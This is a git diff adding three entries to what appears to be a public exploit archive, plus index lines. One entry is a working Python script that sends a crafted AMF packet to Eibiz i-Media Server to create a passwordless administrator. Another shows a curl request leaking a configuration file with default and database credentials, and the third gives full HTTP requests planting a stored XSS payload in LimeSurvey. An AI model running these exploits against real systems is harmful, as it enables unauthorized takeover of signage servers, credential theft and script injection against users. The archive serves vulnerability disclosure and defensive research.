diff --git a/exploits/hardware/webapps/48763.txt b/exploits/hardware/webapps/48763.txt new file mode 100644 index 000000000..db3978f84 --- /dev/null +++ b/exploits/hardware/webapps/48763.txt @@ -0,0 +1,269 @@ +# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass +# Date: 2020-08-21 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.eibiz.co.th +# Version: <=3.8.0 +# CVE: N/A + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# Eibiz i-Media Server Digital Signage 3.8.0 (createUser) Authentication Bypass (Add Admin) +# +# +# Vendor: EIBIZ Co.,Ltd. +# Product web page: http://www.eibiz.co.th +# Affected version: <=3.8.0 +# +# Summary: EIBIZ develop advertising platform for out of home media in that +# time the world called "Digital Signage". Because most business customers +# still need get outside to get in touch which products and services. Online +# media alone cannot serve them right place, right time. +# +# Desc: The application suffers from unauthenticated privilege escalation and +# arbitrary user creation vulnerability that allows authentication bypass. +# Once serialized, an AMF encoded object graph may be used to persist and retrieve +# application state or allow two endpoints to communicate through the exchange +# of strongly typed data. These objects are received by the server without validation +# and authentication and gives the attacker the ability to create any user with +# any role and bypass the security control in place and modify presented data on +# the screen/billboard. +# +# ========================================================================================= +# +# # python3 imedia_createUser.py 192.168.1.1 waddup +# +# --Sending serialized object... +# --Replaying... +# +# ------------------------------------------------------ +# Admin user 'waddup' successfully created. No password. +# ------------------------------------------------------ +# +# ========================================================================================= +# +# Tested on: Windows Server 2016 +# Windows Server 2012 R2 +# Windows Server 2008 R2 +# Apache Flex +# Apache Tomcat/6.0.14 +# Apache-Coyote/1.1 +# BlazeDS Application +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2020-5586 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5586.php +# +# +# 26.07.2020 +# +# + +import time as go +import requests +import sys +import re + +class __CreateAdmin__: + + def __init__(self): + self.ep = "/messagebroker/amf" + self.agent = "CharlieChaplin" + self.amfpacket = None + self.bytecount = None + self.bytesdata = None + self.address = None + self.headers = None + self.usrname = None + self.ende = None + + def usage(self): + if len(sys.argv) != 3: + self.me() + msg = "\x20i-Media Server Digital Signage 3.8.0 Auth Bypass/Add Admin" + brd = "-" * len(msg + "\x20") + print("\n" + brd) + print(msg) + print("\x20Usage: ./i-media.py [ip] [username]") + print(brd) + exit(12) + else: + self.address = sys.argv[1] + self.usrname = sys.argv[2] + if not "http" in self.address: + self.address = "http://{}".format(self.address) + + def amf(self): + self.headers = {"User-Agent" : self.agent, + "Accept" : "*/*", + "Accept-Language" : "en-US,en;q=0.5", + "Accept-Encoding" : "gzip, deflate", + "Origin" : self.address, + "Connection" : "close", + "Referer" : self.address + "/main.swf", + "Content-Type" : "application/x-amf"} + + self.amfpacket = b"\x00\x03\x00\x00\x00\x01\x00\x04\x6E" + self.amfpacket += b"\x75\x6C\x6C\x00\x03\x2F\x33\x36\x00" + self.amfpacket += b"\x00\x01\xB3\x0A\x00\x00\x00\x01\x11" + self.amfpacket += b"\x0A\x81\x13\x4F\x66\x6C\x65\x78\x2E" + self.amfpacket += b"\x6D\x65\x73\x73\x61\x67\x69\x6E\x67" + self.amfpacket += b"\x2E\x6D\x65\x73\x73\x61\x67\x65\x73" + self.amfpacket += b"\x2E\x52\x65\x6D\x6F\x74\x69\x6E\x67" + self.amfpacket += b"\x4D\x65\x73\x73\x61\x67\x65\x0D\x73" + self.amfpacket += b"\x6F\x75\x72\x63\x65\x13\x6F\x70\x65" + self.amfpacket += b"\x72\x61\x74\x69\x6F\x6E\x13\x74\x69" + self.amfpacket += b"\x6D\x65\x73\x74\x61\x6D\x70\x09\x62" + self.amfpacket += b"\x6F\x64\x79\x11\x63\x6C\x69\x65\x6E" + self.amfpacket += b"\x74\x49\x64\x0F\x68\x65\x61\x64\x65" + self.amfpacket += b"\x72\x73\x15\x74\x69\x6D\x65\x54\x6F" + self.amfpacket += b"\x4C\x69\x76\x65\x17\x64\x65\x73\x74" + self.amfpacket += b"\x69\x6E\x61\x74\x69\x6F\x6E\x13\x6D" + self.amfpacket += b"\x65\x73\x73\x61\x67\x65\x49\x64\x01" + self.amfpacket += b"\x06\x15\x63\x72\x65\x61\x74\x65\x55" + self.amfpacket += b"\x73\x65\x72\x04\x00\x09\x03\x01\x0A" + self.amfpacket += b"\x81\x73\x1B\x64\x73\x2E\x6D\x6F\x64" + self.amfpacket += b"\x65\x6C\x2E\x55\x73\x65\x72\x11\x70" + self.amfpacket += b"\x61\x73\x73\x77\x6F\x72\x64\x0D\x63" + self.amfpacket += b"\x72\x65\x61\x74\x65\x07\x74\x65\x6C" + self.amfpacket += b"\x07\x66\x61\x78\x09\x6E\x61\x6D\x65" + self.amfpacket += b"\x0F\x61\x64\x64\x72\x65\x73\x73\x0D" + self.amfpacket += b"\x75\x70\x64\x61\x74\x65\x05\x69\x64" + self.amfpacket += b"\x0D\x6D\x6F\x62\x69\x6C\x65\x0F\x75" + self.amfpacket += b"\x44\x65\x6C\x65\x74\x65\x15\x64\x65" + self.amfpacket += b"\x70\x61\x72\x74\x6D\x65\x6E\x74\x09" + self.amfpacket += b"\x72\x6F\x6C\x65\x09\x72\x65\x61\x64" + self.amfpacket += b"\x0B\x65\x6D\x61\x69\x6C\x0F\x63\x6F" + self.amfpacket += b"\x6D\x70\x61\x6E\x79\x06\x01\x03\x06" + self.amfpacket += b"\x01\x06\x01\x06" ##################" + self.bytecount = len(self.usrname * 2) + 1 + self.bytesdata = [self.bytecount] + self.amfpacket += "".join(map(chr, self.bytesdata)) + self.amfpacket += (bytes(self.usrname.encode("utf-8"))) + self.amfpacket += b"\x06\x01\x03\x06\x36\x06\x01\x03\x06" + self.amfpacket += b"\x01\x06\x1B\x41\x64\x6D\x69\x6E\x69" + self.amfpacket += b"\x73\x74\x72\x61\x74\x6F\x72\x03\x06" + self.amfpacket += b"\x01\x06\x01\x01\x0A\x0B\x01\x15\x44" + self.amfpacket += b"\x53\x45\x6E\x64\x70\x6F\x69\x6E\x74" + self.amfpacket += b"\x06\x0D\x6D\x79\x2D\x61\x6D\x66\x09" + self.amfpacket += b"\x44\x53\x49\x64\x06\x49\x39\x36\x42" + self.amfpacket += b"\x30\x42\x46\x38\x43\x2D\x41\x31\x31" + self.amfpacket += b"\x41\x2D\x38\x41\x32\x34\x2D\x38\x31" + self.amfpacket += b"\x43\x31\x2D\x35\x38\x37\x45\x41\x33" + self.amfpacket += b"\x41\x43\x41\x33\x38\x43\x01\x04\x00" + self.amfpacket += b"\x06\x17\x75\x73\x65\x72\x53\x65\x72" + self.amfpacket += b"\x76\x69\x63\x65\x06\x49\x39\x39\x46" + self.amfpacket += b"\x45\x43\x43\x46\x39\x2D\x34\x41\x38" + self.amfpacket += b"\x44\x2D\x46\x46\x34\x31\x2D\x31\x41" + self.amfpacket += b"\x36\x36\x2D\x42\x46\x39\x31\x32\x45" + self.amfpacket += b"\x42\x42\x44\x36\x35\x36" ##########" + + print("\n--Sending serialized object...") + req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) + #print(req.text.encode("utf-8")) + go.sleep(2) + print("--Replaying...") + req = requests.post(self.address + self.ep, headers=self.headers, data=self.amfpacket) + #print(req.text.encode("utf-8")) + self.ende = "Admin user '" + self.usrname + "' successfully created. No password." + print + print("-" * len(self.ende)) + print(self.ende) + print("-" * len(self.ende)) + + def me(self): + cc = """ + + /`,.,,,. + :.......,, + ,.........7 + ,.........$ + ......:=+=$ + I.....,,:~,.: + $.?7IZDDNNN~. + $$: 8D=:I D, + D~,7NI7DNN + DDD NNN: + D8.ININ; + D8?7DZS + .ZDNNND D + S..,.~8?,N OO77 + N......,..$=77:+?=~8 + :......,::=.I8?:+=.=+~++ + =.......,:+$=+O:+==~~++++= + 8...........~7D$::~..~====:++ + I.............:+.....~~~=~:~+? + N,............. .+...,:~=+~~ :+=$ + ;....... ......, .,....,:=+:,..~=? + Z,,...... :............,::~~=...===I + =.......$ Z...... =~,,,,.,:~,...,7~= + +....... 8.....,.=~~~:.~~~=:~ ..:$== + ,...... +,..,,:.=~:~+I:,+I=8:...=?~ + ,....., =...,,,8+=,:~=~I=~~ N...:+? + ,.,.,.8 ,..,.,?DN~+~:=+::?D ..:=? + 8...... ,...7=Z$DN:?::=I~~$ =..,=+ + ...,..D ,....O88D,8D,:=:==+?? ...,:7 + ,....7 ,..:$Z8D8=8DZ~~=~+==? :..:~+ + ......8D .. .... :?~8D:.:~~=++ ..,~II + :....~D+: . . . ..,..==~===N +,.,=$ + ,. DDND.......... .,...,===+=N ..,+?Z + DD 88 .......... ....,..~+=~N ..,~?I + ....... ,,.,,.:...=?? 8..~=I$ + ....... ...,,,,. ,:~= ..:=~? + ........ ,.,,..,:.. I.:+?+D + ....... .......,:,,8 ,..IN + ........ .,.. ..,,:.: :8N + ........ ... ..,::,, I+O + ........ ......,:,. O.ZN + ........ . . ...,,,,. D+ + ............ ....,,,. = + ....... . ....,,, ? + ....... .....,,, 7 + ...... . ..,,,, + + :..... ..,.,, 8 + :....... =. .....,,,N 8 + ~....... D. .....,,,D 8 + ~....... D. . ...,,,O D + =.... .....,,Z ?` + +...... . :........,.$ + + I...... ........,.7 = + Z........ . . ....,,7 D + N..... ... . ........I 8 + ..... ... , ........I 8 + ...... . = .. .....I 7 + :.. . ..7 8... .....I ? + Z.. D .. ....7 N NND88OOOOOOO88DN + O.. . .. ....O O D8OZ$77II777$$ZO8DN + ... . .. . .....N NNNNDDD+D888OOZ$7IIIIII7$ZO8DDN + .,. ....O O.. ..88OOZZ$$777~777IIIIIIIIIIIIIII77$Z8N + $.. ...88.. ..:ZZZZ$77IIII,IIIIIIIIII77777IIII7ZODN + ... ... ,7777IIIIIIII,IIIIII77$O88OZ7III7Z8N + Z.. ~7. . ,IIIIIIIIIIIII,IIII7$O8DN NDO$77$Z8N + =.. .. . 8. .IIIIIIIIIIIIII~I7$Z8DN NND88DDN + ... .?, I777IIIIIIIII7$~O8N NNNNN + 8.... .I. ...7IIIIII7$Z8DD NNNNN + NND=....~,=~ ...+I . . ..I$$ZO8DN NN NNNNN + N.+?~.~,=~=... ... $O.. . ...~:..=IINN $NNN + ?,:..:,.=N I.....,,=I+ N8 + ~....,8 + + """ + + j = 0 + while j < len(cc): + char = cc[j] + sys.stdout.write(char) + go.sleep(10.0 / 100000.0) + j = j + 1 + + def main(self): + self.usage() + self.amf() + +if __name__ == '__main__': + __CreateAdmin__().main() \ No newline at end of file diff --git a/exploits/hardware/webapps/48764.txt b/exploits/hardware/webapps/48764.txt new file mode 100644 index 000000000..71fea210a --- /dev/null +++ b/exploits/hardware/webapps/48764.txt @@ -0,0 +1,82 @@ +# Exploit Title: Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure +# Date: 2020-08-21 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.eibiz.co.th +# Version: <=3.8.0 +# CVE: N/A + +Eibiz i-Media Server Digital Signage 3.8.0 Configuration Disclosure + + +Vendor: EIBIZ Co.,Ltd. +Product web page: http://www.eibiz.co.th +Affected version: <=3.8.0 + +Summary: EIBIZ develop advertising platform for out of home media in that +time the world called "Digital Signage". Because most business customers +still need get outside to get in touch which products and services. Online +media alone cannot serve them right place, right time. + +Desc: i-Media Server is vulnerable to unauthenticated configuration disclosure +when direct object reference is made to the SiteConfig.properties file using an +HTTP GET method. This will enable the attacker to disclose sensitive information +and help her in authentication bypass, privilege escalation and/or full system access. + +Tested on: Windows Server 2016 + Windows Server 2012 R2 + Windows Server 2008 R2 + Apache Flex + Apache Tomcat/6.0.14 + Apache-Coyote/1.1 + BlazeDS Application + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5583 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5583.php + + +26.07.2020 + +-- + + +$ curl http://192.168.1.1/config/SiteConfig.properties +server.mode=testing +admin.username=admin +admin.password=admin +designer.username=designer +designer.password=designer +reporter.username=reporter +reporter.password=reporter +db.PriDBServerIp=127.0.0.1 +db.PriDBServerPort=3306 +db.PriDBServerUser=root +db.PriDBServerPwd=eibiz1234 +db.PriDBName=imediadb +account.appId=1 +account.RootPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ +account.ContentPath=C:/iMediaServWeb/tomcat/webapps/ROOT/ +account.imediasuitURL=http://localhost:8080/UserAPI/v1/user/applogin +account.ReportInteractive=0 +account.ReportPlayer=1 +account.ReportMedia=1 +account.ReportTransfer=1 +ConcurrentDownload=10 +BindingAddress=192.168.1.1 +ServicePort=643 +EndPointPort=644 +AndroidServicePort=8080 +AndroidEndPointPort=8081 +RequireApprove= +OutgoingMailServer= +MailUser= +MailPassword= +mongodb.PriMongoDBName=imediadb_sandbox +mongodb.PriMongoDBServerIp=localhost +mongodb.PriMongoDBServerPort=27017 +mongodb.PriMongoDBUser= +mongodb.PriMongoDBPwd= \ No newline at end of file diff --git a/exploits/php/webapps/48762.txt b/exploits/php/webapps/48762.txt new file mode 100644 index 000000000..f3889249a --- /dev/null +++ b/exploits/php/webapps/48762.txt @@ -0,0 +1,51 @@ +# Exploit Title: LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting +# Date: 2020-08-23 +# Exploit Author: Matthew Aberegg +# Vendor Homepage: https://www.limesurvey.org +# Version: LimeSurvey 4.3.10+200812 +# Tested on: Ubuntu 18.04.4 +# Patch Link: https://github.com/LimeSurvey/LimeSurvey/commit/3712854a8fd8d875c67640969a1d54c4d93d3676 + + +# Vulnerability Details +Description : A stored cross-site scripting vulnerability exists within the "Survey Menu" functionality of the LimeSurvey administration panel. +Vulnerable Parameters : Surveymenu[parent_id] + + +# POC +# Request 1 : Create a survey menu with the Surveymenu[title] parameter set to an XSS payload. + +POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 524 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view +Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D + +YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=&Surveymenu%5Bordering%5D=0&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=realmenu&Surveymenu%5Btitle%5D=%3Csvg%2Fonload%3Dalert(1)%3E&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A40%3A10&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D= + + +# Request 2 : Create a survey menu with the Surveymenu[parent_id] parameter set to the survey id from the previous request. The XSS payload will be triggered by this survey menu. + +POST /limesurvey/index.php/admin/menus/sa/update/id/ HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 505 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/limesurvey/index.php/admin/menus/sa/view +Cookie: LS-MRZROBQAFECYWCMT=v1ac49ivhs7bb5ocb8sqc7oq51; YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D + +YII_CSRF_TOKEN=MHJySEhYVVcyNVc5YW5lcGNnRnozWVFGfldsOWtTT0XF8KTDFDqAxWRy74os9IE7fnIebwNOpPUORaKPD3o4fA%3D%3D&Surveymenu%5Bparent_id%5D=11&Surveymenu%5Bsurvey_id%5D=&Surveymenu%5Buser_id%5D=5&Surveymenu%5Bordering%5D=1&Surveymenu%5Bshowincollapse%5D=0&Surveymenu%5Bname%5D=xssmenu&Surveymenu%5Btitle%5D=XSS+Test&Surveymenu%5Bdescription%5D=XSS+Test&Surveymenu%5Bposition%5D=side&Surveymenu%5Bchanged_by%5D=1&Surveymenu%5Bchanged_at%5D=2020-08-15+20%3A42%3A58&Surveymenu%5Bcreated_by%5D=1&Surveymenu%5Bid%5D= \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 37d8723ee..f153ce595 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43001,3 +43001,6 @@ id,file,description,date,author,type,platform,port 48758,exploits/php/webapps/48758.txt,"Complaint Management System 1.0 - 'cid' SQL Injection",2020-08-21,"Mohamed Elobeid",webapps,php, 48759,exploits/hardware/webapps/48759.txt,"Seowon SlC 130 Router - Remote Code Execution",2020-08-21,maj0rmil4d,webapps,hardware, 48761,exploits/php/webapps/48761.rb,"vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)",2017-07-24,Metasploit,webapps,php, +48762,exploits/php/webapps/48762.txt,"LimeSurvey 4.3.10 - 'Survey Menu' Persistent Cross-Site Scripting",2020-08-24,"Matthew Aberegg",webapps,php, +48763,exploits/hardware/webapps/48763.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass",2020-08-24,LiquidWorm,webapps,hardware, +48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,